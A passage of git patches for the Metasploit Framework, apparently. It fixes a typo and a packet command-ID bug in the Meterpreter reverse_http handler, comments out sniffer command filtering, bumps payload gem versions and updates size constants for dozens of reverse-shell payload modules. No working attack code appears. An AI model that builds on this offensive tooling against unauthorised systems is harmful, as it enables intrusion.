       'sniffer_interfaces' => 'Enumerate all sniffable network interfaces',
       'sniffer_start'      => 'Start packet capture on a specific interface',
       'sniffer_stop'       => 'Stop packet capture on a specific interface',
@@ -39,16 +39,16 @@ def commands
       'sniffer_release'    => 'Free captured packets on a specific interface instead of downloading them',
     }
 
-    reqs = {
-      'sniffer_interfaces' => [COMMAND_ID_SNIFFER_INTERFACES],
-      'sniffer_start'      => [COMMAND_ID_SNIFFER_CAPTURE_START],
-      'sniffer_stop'       => [COMMAND_ID_SNIFFER_CAPTURE_STOP],
-      'sniffer_stats'      => [COMMAND_ID_SNIFFER_CAPTURE_STATS],
-      'sniffer_dump'       => [COMMAND_ID_SNIFFER_CAPTURE_DUMP],
-      'sniffer_release'    => [COMMAND_ID_SNIFFER_CAPTURE_RELEASE],
-    }
+    #reqs = {
+    #  'sniffer_interfaces' => [COMMAND_ID_SNIFFER_INTERFACES],
+    #  'sniffer_start'      => [COMMAND_ID_SNIFFER_CAPTURE_START],
+    #  'sniffer_stop'       => [COMMAND_ID_SNIFFER_CAPTURE_STOP],
+    #  'sniffer_stats'      => [COMMAND_ID_SNIFFER_CAPTURE_STATS],
+    #  'sniffer_dump'       => [COMMAND_ID_SNIFFER_CAPTURE_DUMP],
+    #  'sniffer_release'    => [COMMAND_ID_SNIFFER_CAPTURE_RELEASE],
+    #}
 
-    filter_commands(all, reqs)
+    #filter_commands(all, reqs)
   end
 
 

From 10529c8b7a8d54a3e0b779962d7942d205832f2c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 18 May 2020 08:34:59 +1000
Subject: [PATCH 13/20] Fix silly typo in the android extension dispatcher

---
 .../post/meterpreter/ui/console/command_dispatcher/android.rb   | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
index 5a55b076ef228..5830f967b4b00 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
-require 'rex/post/meterpreter/exensions/android/command_ids'
+require 'rex/post/meterpreter/extensions/android/command_ids'
 require 'msf/core/auxiliary/report'
 require 'rex/google/geolocation'
 require 'date'

From 48290ac38acfcd15bff8a305b38d5b73b188ecf4 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 4 Jun 2020 12:01:27 +1000
Subject: [PATCH 14/20] Fix a stupid mistake with core_patch_url

This was not originally ported to an int when it should have been.
---
 lib/msf/core/handler/reverse_http.rb | 4 ++--
 lib/rex/post/meterpreter/packet.rb   | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index 06804b5d38324..781748ac9a1f6 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -3,6 +3,7 @@
 require 'rex/sync/ref'
 require 'rex/payloads/meterpreter/uri_checksum'
 require 'rex/post/meterpreter'
+require 'rex/post/meterpreter/core_ids'
 require 'rex/socket/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 require 'rex/user_agent'
@@ -367,8 +368,7 @@ def on_request(cli, req)
         # was generated on the fly. This means we form a new session for each.
 
         # Hurl a TLV back at the caller, and ignore the response
-        pkt = Rex::Post::Meterpreter::Packet.new(Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE,
-                                                 'core_patch_url')
+        pkt = Rex::Post::Meterpreter::Packet.new(Rex::Post::Meterpreter::PACKET_TYPE_RESPONSE, Rex::Post::Meterpreter::COMMAND_ID_CORE_PATCH_URL)
         pkt.add_tlv(Rex::Post::Meterpreter::TLV_TYPE_TRANS_URL, conn_id + "/")
         resp.body = pkt.to_r
 
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 8d1e20df7c163..fdbb33a60dde6 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -914,7 +914,7 @@ def method?(method)
   # Sets the packet's method TLV to the method supplied.
   #
   def method=(method)
-    raise ArgumentError.new('Packet.method must be an integer') unless method.is_a?(Integer)
+    raise ArgumentError.new("Packet.method must be an integer. Current value is #{method}") unless method.is_a?(Integer)
     add_tlv(TLV_TYPE_COMMAND_ID, method, true)
   end
 

From 6f7861f17ec59e4c2e2f0698f706ed74a9464cbf Mon Sep 17 00:00:00 2001
From: Brent Cook <busterb@gmail.com>
Date: Wed, 3 Jun 2020 07:08:06 -0500
Subject: [PATCH 15/20] bump payloads version

---
 Gemfile.lock                 | 8 ++++----
 metasploit-framework.gemspec | 4 ++--
 2 files changed, 6 insertions(+), 6 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 06267867ce6e7..ab1fde4074c4d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -29,9 +29,9 @@ PATH
       metasploit-concern (~> 2.0.0)
       metasploit-credential (~> 3.0.0)
       metasploit-model (~> 2.0.4)
-      metasploit-payloads (= 1.4.2)
+      metasploit-payloads (= 2.0.0)
       metasploit_data_models (~> 3.0.10)
-      metasploit_payloads-mettle (= 0.5.21)
+      metasploit_payloads-mettle (= 1.0.0)
       mqtt
       msgpack
       nessus_rest
@@ -220,7 +220,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.4.2)
+    metasploit-payloads (2.0.0)
     metasploit_data_models (3.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -231,7 +231,7 @@ GEM
       postgres_ext
       railties (~> 4.2.6)
       recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.21)
+    metasploit_payloads-mettle (1.0.0)
     method_source (1.0.0)
     mini_portile2 (2.4.0)
     minitest (5.14.1)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 4c47ca16bb27f..1626ef2bad298 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,9 +70,9 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 2.0.4'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.4.2'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.0'
   # Needed for the next-generation POSIX Meterpreter
-  spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.5.21'
+  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.0'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # get list of network interfaces, like eth* from OS.

From 6ec8e942c25ddb2908ba50a52e657069c3129512 Mon Sep 17 00:00:00 2001
From: Brent Cook <busterb@gmail.com>
Date: Wed, 3 Jun 2020 07:08:50 -0500
Subject: [PATCH 16/20] update sizes

---
 .../singles/apple_ios/aarch64/meterpreter_reverse_http.rb       | 2 +-
 .../singles/apple_ios/aarch64/meterpreter_reverse_https.rb      | 2 +-
 .../singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb        | 2 +-
 .../singles/apple_ios/armle/meterpreter_reverse_http.rb         | 2 +-
 .../singles/apple_ios/armle/meterpreter_reverse_https.rb        | 2 +-
 .../payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb | 2 +-
 modules/payloads/singles/cmd/unix/reverse_python_ssl.rb         | 2 +-
 .../payloads/singles/linux/aarch64/meterpreter_reverse_http.rb  | 2 +-
 .../payloads/singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +-
 .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb   | 2 +-
 .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb    | 2 +-
 .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb   | 2 +-
 modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +-
 .../payloads/singles/linux/armle/meterpreter_reverse_http.rb    | 2 +-
 .../payloads/singles/linux/armle/meterpreter_reverse_https.rb   | 2 +-
 modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +-
 .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb   | 2 +-
 .../payloads/singles/linux/mips64/meterpreter_reverse_https.rb  | 2 +-
 .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb    | 2 +-
 .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb   | 2 +-
 .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb  | 2 +-
 .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb    | 2 +-
 .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb   | 2 +-
 .../payloads/singles/linux/mipsle/meterpreter_reverse_https.rb  | 2 +-
 .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb    | 2 +-
 modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb  | 2 +-
 modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb | 2 +-
 modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb   | 2 +-
 .../payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb  | 2 +-
 .../payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb | 2 +-
 .../payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb   | 2 +-
 .../singles/linux/ppce500v2/meterpreter_reverse_http.rb         | 2 +-
 .../singles/linux/ppce500v2/meterpreter_reverse_https.rb        | 2 +-
 .../payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb | 2 +-
 modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb  | 2 +-
 modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb | 2 +-
 modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb   | 2 +-
 modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb  | 2 +-
 modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +-
 modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb   | 2 +-
 .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb    | 2 +-
 .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb   | 2 +-
 modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +-
 modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb    | 2 +-
 modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb   | 2 +-
 modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb     | 2 +-
 modules/payloads/singles/php/meterpreter_reverse_tcp.rb         | 2 +-
 modules/payloads/singles/python/meterpreter_bind_tcp.rb         | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_http.rb     | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_https.rb    | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_tcp.rb      | 2 +-
 modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb | 2 +-
 modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb | 2 +-
 modules/payloads/singles/windows/meterpreter_bind_tcp.rb        | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_http.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_https.rb   | 2 +-
 .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb    | 2 +-
 modules/payloads/singles/windows/meterpreter_reverse_tcp.rb     | 2 +-
 .../payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb | 2 +-
 .../payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb | 2 +-
 modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_http.rb    | 2 +-
 .../payloads/singles/windows/x64/meterpreter_reverse_https.rb   | 2 +-
 .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb         | 2 +-
 modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +-
 modules/payloads/stagers/windows/encrypted_reverse_tcp.rb       | 2 +-
 modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb   | 2 +-
 67 files changed, 67 insertions(+), 67 deletions(-)

diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
index c7c1c495b1ed1..7bbc59b5b259b 100644
--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 777708
+  CachedSize = 777632
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
index c1c1a373dcdab..87990008ab402 100644
--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 777708
+  CachedSize = 777632
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
index e2c27c8649906..4d91603df843d 100644
--- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 777708
+  CachedSize = 777632
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb
index db1b846e595f2..1bb5f83b11015 100644
--- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 637708
+  CachedSize = 621224
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb
index 5a0f516b5a4ef..b02f4ec91e34e 100644
--- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 637708
+  CachedSize = 621224
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb
index bba532a891756..6d8ea05c9bc8d 100644
--- a/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 637708
+  CachedSize = 621224
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
index 7f32eaeea05c3..9dfd5b42beaf8 100644
--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = :dynamic
+  CachedSize = 629
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
index 55222617a4ae7..b67d638b7b10d 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1096264
+  CachedSize = 1092000
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
index 3eec81722b6bb..c89ae043acbff 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1096264
+  CachedSize = 1092000
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
index 595b78262aa42..15195e8da6669 100644
--- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1096264
+  CachedSize = 1092000
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
index b4843159fbfe8..052c6fd68cfa1 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1025916
+  CachedSize = 1022556
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
index c3ed36817f20a..f4294b8c6eec0 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1025916
+  CachedSize = 1022556
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
index cd35f94d72299..3e5050eb865b9 100644
--- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1025916
+  CachedSize = 1022556
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
index 08cbf0ad68a58..ef7533785117d 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1025984
+  CachedSize = 1022556
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
index b7f1e2657e3c5..30832ec778829 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1025984
+  CachedSize = 1022556
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
index 81202f7c80e78..91206e5707965 100644
--- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1025984
+  CachedSize = 1022556
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
index 6469ea0e7b3ee..17681bf49bd34 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1573984
+  CachedSize = 1568840
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
index b763703f31f57..3c25edfcde418 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1573984
+  CachedSize = 1568840
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
index 52d29f91b6e09..72952960eb300 100644
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1573984
+  CachedSize = 1568840
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
index 8a0e1dd19bbe0..cbcabd049d796 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1465068
+  CachedSize = 1460684
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
index 506cae6d6caa0..d913e35f1fb84 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1465068
+  CachedSize = 1460684
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
index 3d4e965fd613e..5f9ab878b7658 100644
--- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1465068
+  CachedSize = 1460684
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
index f721408ce0d53..54f5121df95eb 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1467528
+  CachedSize = 1463140
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
index 2a2575cf4de6f..70c945448c47e 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1467528
+  CachedSize = 1463140
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
index 533b98d337af9..d34c6f22409c0 100644
--- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1467528
+  CachedSize = 1463140
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
index 1292c8e60b3dc..31ffd2388a772 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1210912
+  CachedSize = 1210840
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
index 90d386ae732b4..8a42ae94f1e3c 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1210912
+  CachedSize = 1210840
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
index ee743cb6184b4..fb3de8bd66d97 100644
--- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1210912
+  CachedSize = 1210840
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
index c307a5285b87f..1aaff45081274 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1169304
+  CachedSize = 1169208
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
index 8e5edd763281c..43bf3431b0fcc 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1169304
+  CachedSize = 1169208
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
index 88f87c313969d..9968525605a61 100644
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1169304
+  CachedSize = 1169208
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb
index b79a23046af15..00a36736ee527 100644
--- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1163592
+  CachedSize = 1163520
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
index a9ec8d1a8c380..33b07d5129110 100644
--- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1163592
+  CachedSize = 1163520
 
   include Msf::Payload::Single
